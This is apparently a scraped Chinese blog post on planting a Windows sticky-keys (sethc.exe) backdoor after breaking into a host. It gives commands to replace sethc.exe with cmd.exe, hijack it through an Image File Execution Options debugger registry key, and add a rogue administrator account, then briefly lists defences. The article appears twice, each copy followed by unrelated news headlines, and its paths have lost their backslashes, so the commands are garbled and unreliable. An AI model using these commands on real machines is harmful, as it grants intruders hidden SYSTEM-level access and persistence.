Windows Shift后门利用
0x00 前言
通常,在内网渗透打下一台机子之后,可以给这台机子留个shift后门。
0x01 shift后门利用
简介
粘滞键漏洞,在windows系统下连续按5下shift键,可以启动系统的粘滞键功能,其进程名为sethc.exe,应用程序在windowssystem32下。
黑客用其它应用程序(如:cmd.exe、explorer.exe 或木马、病毒)将sethc.exe替换。当再次连续按5次shift键,就会启动黑客替换的应用程序,如此便留下了5下shift后门,黑客3389登录远程计算机时,在用户登录界面,连续按5下shift就可以启动该漏洞,进而控制远程计算机。
漏洞原理
在windows系统登录界面状态下,粘滞键仍可以以连续按5下shift键运行,并且此时应用程序会以windows的最高权限-system权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算机。
漏洞利用
大致思路如下:
拿到目标主机权限后,到windowssystem32目录下,将sethc.exe替换成cmd.exe;
其中,命令行方式为:
copy c:windowssystem32cmd.exe c:windowssystem32sethc.execopy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exeattrib c:windowssystem32sethc.exe +hattrib c:windowssystem32dllcachesethc.exe +h
注意:要将dllcache文件夹中的缓存删掉,否则会自动复原回去。
注册表方式为:
reg add hklmsoftwaremicrosoftwindows ntcurrentversionimage file execution optionssethc.exe /v debugger /t reg_sz /d c:windowssystem32cmd.exe
命令说明:reg add是向注册表添加记录,后面跟的是注册表的位置,注意的是hklm是hkey_local_machine的缩写。image file execution option这个目录是用来设置镜像劫持的,要被劫持的就是命令中的sethc粘滞键程序,随后通过/ v来指定键名,其中键名debugger是固定的,然后通过/ t来指定reg_sz字符串类型,最后通过/ d来指定键的值,即被恶意替换的程序cmd.exe。
这样,在下次远程连接目标主机登录的时候就可以连续5下shift触发cmd.exe;
可以输入explorer.exe调出程序管理系统方便操作;
当然,上面的方法存在缺陷,就是可能会导致远程连接无法持久进行,因此可以直接添加新用户便于下次直接登录:
net user mi1k7ea 123456 /addnet localgroup administrators mi1k7ea /add'
防御方法
如果系统盘为ntfs文件系统,可以将sytem32下的sethc.exe文件设为everyone拒绝访问;
直接将其删除,最好的方法是在控制面板-辅助功能选项-粘滞键选项,将“使用快捷键”取消即可。;
通过注册表设置实现防御;
五月面市 品红版诺基亚Lumia900预售
LED 光源工作原理
变频器检修前的准备事项盘点
精密封装推拉力机是什么?生产商、测试标准及生产厂家
标致508L的红外夜视技术 你的手机也能拥有
Windows Shift后门利用
英特尔宣布展开ProjectAthena开放实验室计划 锁定2020年及未来之使用经验
图解NumPy的核心概念:向量、矩阵、3维及更高维数组
苹果面向开发人员推送iOS 14.4 RC版更新页面
斯柯达明锐和丰田卡罗拉谁更全面、更出色?
闻泰科技已承接订单,荣耀重返印度手机市场
JDI欲出售旗下手机面板业务 苹果或夏普有意接手
Q1季度高端智能手机出货量同比下降13%,苹果以57%的市场份额领跑
在国内不受待见的小米MIX,在国外价格炒翻一倍,魅力不小!
直流电源延时电路图解说明
大众的PHEV电池系统发展
TVS瞬态电压抑制器/管的原理、体积、极性
vlookup函数能匹配文本吗
市值缩水1900亿美元?苹果市场需求衰退,这些供应商或遭拖累?
Aclara:工业物联网已迈入加速采用物联网和数据传输技术的阶段
通常,在内网渗透打下一台机子之后,可以给这台机子留个shift后门。
0x01 shift后门利用
简介
粘滞键漏洞,在windows系统下连续按5下shift键,可以启动系统的粘滞键功能,其进程名为sethc.exe,应用程序在windowssystem32下。
黑客用其它应用程序(如:cmd.exe、explorer.exe 或木马、病毒)将sethc.exe替换。当再次连续按5次shift键,就会启动黑客替换的应用程序,如此便留下了5下shift后门,黑客3389登录远程计算机时,在用户登录界面,连续按5下shift就可以启动该漏洞,进而控制远程计算机。
漏洞原理
在windows系统登录界面状态下,粘滞键仍可以以连续按5下shift键运行,并且此时应用程序会以windows的最高权限-system权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算机。
漏洞利用
大致思路如下:
拿到目标主机权限后,到windowssystem32目录下,将sethc.exe替换成cmd.exe;
其中,命令行方式为:
copy c:windowssystem32cmd.exe c:windowssystem32sethc.execopy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exeattrib c:windowssystem32sethc.exe +hattrib c:windowssystem32dllcachesethc.exe +h
注意:要将dllcache文件夹中的缓存删掉,否则会自动复原回去。
注册表方式为:
reg add hklmsoftwaremicrosoftwindows ntcurrentversionimage file execution optionssethc.exe /v debugger /t reg_sz /d c:windowssystem32cmd.exe
命令说明:reg add是向注册表添加记录,后面跟的是注册表的位置,注意的是hklm是hkey_local_machine的缩写。image file execution option这个目录是用来设置镜像劫持的,要被劫持的就是命令中的sethc粘滞键程序,随后通过/ v来指定键名,其中键名debugger是固定的,然后通过/ t来指定reg_sz字符串类型,最后通过/ d来指定键的值,即被恶意替换的程序cmd.exe。
这样,在下次远程连接目标主机登录的时候就可以连续5下shift触发cmd.exe;
可以输入explorer.exe调出程序管理系统方便操作;
当然,上面的方法存在缺陷,就是可能会导致远程连接无法持久进行,因此可以直接添加新用户便于下次直接登录:
net user mi1k7ea 123456 /addnet localgroup administrators mi1k7ea /add'
防御方法
如果系统盘为ntfs文件系统,可以将sytem32下的sethc.exe文件设为everyone拒绝访问;
直接将其删除,最好的方法是在控制面板-辅助功能选项-粘滞键选项,将“使用快捷键”取消即可。;
通过注册表设置实现防御;
五月面市 品红版诺基亚Lumia900预售
LED 光源工作原理
变频器检修前的准备事项盘点
精密封装推拉力机是什么?生产商、测试标准及生产厂家
标致508L的红外夜视技术 你的手机也能拥有
Windows Shift后门利用
英特尔宣布展开ProjectAthena开放实验室计划 锁定2020年及未来之使用经验
图解NumPy的核心概念:向量、矩阵、3维及更高维数组
苹果面向开发人员推送iOS 14.4 RC版更新页面
斯柯达明锐和丰田卡罗拉谁更全面、更出色?
闻泰科技已承接订单,荣耀重返印度手机市场
JDI欲出售旗下手机面板业务 苹果或夏普有意接手
Q1季度高端智能手机出货量同比下降13%,苹果以57%的市场份额领跑
在国内不受待见的小米MIX,在国外价格炒翻一倍,魅力不小!
直流电源延时电路图解说明
大众的PHEV电池系统发展
TVS瞬态电压抑制器/管的原理、体积、极性
vlookup函数能匹配文本吗
市值缩水1900亿美元?苹果市场需求衰退,这些供应商或遭拖累?
Aclara:工业物联网已迈入加速采用物联网和数据传输技术的阶段